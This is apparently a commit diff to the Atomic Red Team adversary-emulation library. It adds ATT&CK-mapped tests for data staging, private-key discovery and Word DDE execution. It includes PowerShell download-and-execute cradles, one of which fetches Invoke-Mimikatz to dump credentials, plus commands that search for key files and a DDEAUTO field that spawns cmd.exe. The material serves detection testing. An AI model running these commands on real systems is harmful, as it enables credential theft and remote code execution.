Technique Adds

Private Keys
- Find them

DDE
- Reference: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

Data Staged

Windows/Collection/Data_Staged.md

@@ -0,0 +1,9 @@
+# Data Staged
+
+MITRE ATT&CK Technique: [T1074](https://attack.mitre.org/wiki/Technique/T1074)
+
+### Stage data from Discovery.bat
+
+Input:
+
+    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > c:\windows\pi.log

Windows/Credential_Access/Private_Keys.md

@@ -0,0 +1,16 @@
+# Private Keys
+
+MITRE ATT&CK Technique: [T1145](https://attack.mitre.org/wiki/Technique/T1145)
+
+File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc
+
+Input:
+
+Make some files:
+
+echo "ATOMICREDTEAM" > %windir%\cert.key
+      dir C:\Users\(username)\.ssh\
+
+Find files:
+
+      dir c:\ /b /s .key | findstr /e .key

Windows/Execution/Dynamic_Data_Exchange.md

@@ -0,0 +1,19 @@
+# Dynamic Data Exchange
+
+MITRE ATT&CK Technique: [T1173](https://attack.mitre.org/wiki/Technique/T1173)
+
+
+### Microsoft Word
+
+Open,
+
+Insert tab -> Quick Parts -> Field
+
+Choose = (Formula) and click ok.
+
+After that, you should see a Field inserted in the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes.
+
+The Field Code should now be displayed, change it to Contain the following:
+
+
+    {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

Windows/Execution/PowerShell.md

@@ -4,7 +4,7 @@ MITRE ATT&CK Technique: [T1086](https://attack.mitre.org/wiki/Technique/T1086)
 
 ### Download Mimikatz and Dump credentials
 
-    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
+    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
 
 ### Download and Execute BloodHound
 

Windows/README.md

@@ -3,17 +3,17 @@
 | Persistence                                           | Privilege Escalation                   | Defense Evasion                         | Credential Access                      | Discovery                              | Lateral Movement                    | Execution                          | Collection                     | Exfiltration                                  | Command and Control                     |
 |-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
 | [Accessibility Features](Persistence/Accessibility_Features.md)                                | Access Token Manipulation              | Access Token Manipulation               | [Account Manipulation](Credential_Access/Account_Manipulation.md)                   | [Account Discovery](Discovery/Account_Discovery.md)                      | Application Deployment Software     | Command-Line Interface             | [Audio Capture](Collection/Audio_Capture.md)                  | Automated Exfiltration                        | Commonly Used Port                      |
-| AppCert DLLs                                          | Accessibility Features                 | Binary Padding                          | [Brute Force](Credential_Access/Brute_Force.md)                            | Application Window Discovery           | Distributed Component Object Model  | Dynamic Data Exchange              | [Automated Collection](Collection/Automated_Collection.md)           | [Data Compressed](Exfiltration/Data_Compressed.md)                               | Communication Through Removable Media   |
+| AppCert DLLs                                          | Accessibility Features                 | Binary Padding                          | [Brute Force](Credential_Access/Brute_Force.md)                            | Application Window Discovery           | Distributed Component Object Model  | [Dynamic Data Exchange](Execution/Dynamic_Data_Exchange.md)              | [Automated Collection](Collection/Automated_Collection.md)           | [Data Compressed](Exfiltration/Data_Compressed.md)                               | Communication Through Removable Media   |
 | [AppInit DLLs](Persistence/AppInit_DLLs.md)                                          | AppCert DLLs                           | Bypass User Account Control             | [Credential Dumping](Credential_Access/Credential_Dumping.md)                     | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md)           | Exploitation of Vulnerability       | Execution through API              | [Browser Extensions](Collection/Browser_Extensions.md)             | Data Encrypted                                | Connection Proxy                        |
 | [Application Shimming](Persistence/Application_Shimming.md)                                  | AppInit DLLs                           | Code Signing                            | [Credentials in Files](Credential_Access/Credentials_in_Files.md)                   | Network Service Scanning               | [Logon Scripts](Persistence/Logon_Scripts.md)                       | Execution through Module Load      | [Clipboard Data](Collection/Clipboard_Data.md)                 | Data Transfer Size Limits                     | Custom Command and Control Protocol     |
-| [Authentication Package](Persistence/Authentication_Package.md)                                | Application Shimming                   | Component Firmware                      | Exploitation of Vulnerability          | Network Share Discovery                | Pass the Hash                       | Graphical User Interface           | Data Staged                    | Exfiltration Over Alternative Protocol        | Custom Cryptographic Protocol           |
+| [Authentication Package](Persistence/Authentication_Package.md)                                | Application Shimming                   | Component Firmware                      | Exploitation of Vulnerability          | Network Share Discovery                | Pass the Hash                       | Graphical User Interface           | [Data Staged](Collection/Data_Staged.md)                    | Exfiltration Over Alternative Protocol        | Custom Cryptographic Protocol           |
 | Bootkit                                               | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md)            | Component Object Model Hijacking        | Forced Authentication                  | Peripheral Device Discovery            | Pass the Ticket                     | [InstallUtil](Execution/InstallUtil.md)                        | Data from Local System         | Exfiltration Over Command and Control Channel | Data Encoding                           |
 | [Browser Extensions](Persistence/Browser_Extensions.md)                                    | DLL Search Order Hijacking             | DLL Search Order Hijacking              | Hooking                                | Permission Groups Discovery            | Remote Desktop Protocol             | LSASS Driver                       | Data from Network Shared Drive | Exfiltration Over Other Network Medium        | Data Obfuscation                        |
 | [Change Default File Association](Persistence/Change_Default_File_Association.md)                       | Exploitation of Vulnerability          | DLL Side-Loading                        | [Input Capture](Collection/Input_Capture.md)                          | Process Discovery                      | Remote File Copy                    | [Mshta](Execution/Mshta.md)                              | Data from Removable Media      | Exfiltration Over Physical Medium             | Domain Fronting                         |
 | Component Firmware                                    | Extra Window Memory Injection          | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning                 | [Query Registry](Discovery/Query_Registry.md)                         | Remote Services                     | [PowerShell](Execution/PowerShell.md)                         | Email Collection               | Scheduled Transfer                            | Fallback Channels                       |
 | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md)                      | File System Permissions Weakness       | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md)                | Network Sniffing                       | [Remote System Discovery](Discovery/Remote_System_Discovery.md)                | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md)                     | Input Capture                  |                                               | Multi-Stage Channels                    |
 | [Create Account](Credential_Access/Create_Account.md)                                        | Hooking                                | Exploitation of Vulnerability           | Password Filter DLL                    | [Security Software Discovery](Discovery/Security_Software_Discovery.md)            | Shared Webroot                      | [Regsvr32](Execution/Regsvr32.md)                           | Man in the Browser             |                                               | Multi-hop Proxy                         |
-| DLL Search Order Hijacking                            | Image File Execution Options Injection | Extra Window Memory Injection           | Private Keys                           | [System Information Discovery](Discovery/System_Information_Discovery.md)           | Taint Shared Content                | [Rundll32](Execution/rundll32.md)                           | Screen Capture                 |                                               | Multiband Communication                 |
+| DLL Search Order Hijacking                            | Image File Execution Options Injection | Extra Window Memory Injection           | [Private Keys](Credential_Access/Private_Keys.md)                           | [System Information Discovery](Discovery/System_Information_Discovery.md)           | Taint Shared Content                | [Rundll32](Execution/rundll32.md)                           | Screen Capture                 |                                               | Multiband Communication                 |
 | External Remote Services                              | [New Service](Persistence/New_Service.md)                            | [File Deletion](Defense_Evasion/File_Deletion.md)                           | Replication Through Removable Media    | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | Third-party Software                | Scheduled Task                     | Video Capture                  |                                               | Multilayer Encryption                   |
 | File System Permissions Weakness                      | Path Interception                      | File System Logical Offsets             | Two-Factor Authentication Interception | System Network Connections Discovery   | [Windows Admin Shares](Lateral_Movement/Windows_Admin_Shares.md)                | Scripting                          |                                |                                               | Remote File Copy                        |
 | [Hidden Files and Directories](Defense_Evasion/Hidden_Files_and_Directories.md)                          | Port Monitors                          | [Hidden Files and Directories](Defense_Evasion/Hidden_Files_and_Directories.md)            |                                        | [System Owner/User Discovery](Discovery/System_Owner-User_Discovery.md)            | [Windows Remote Management](Lateral_Movement/Windows_Remote_Management.md)           | Service Execution                  |                                |                                               | Standard Application Layer Protocol     |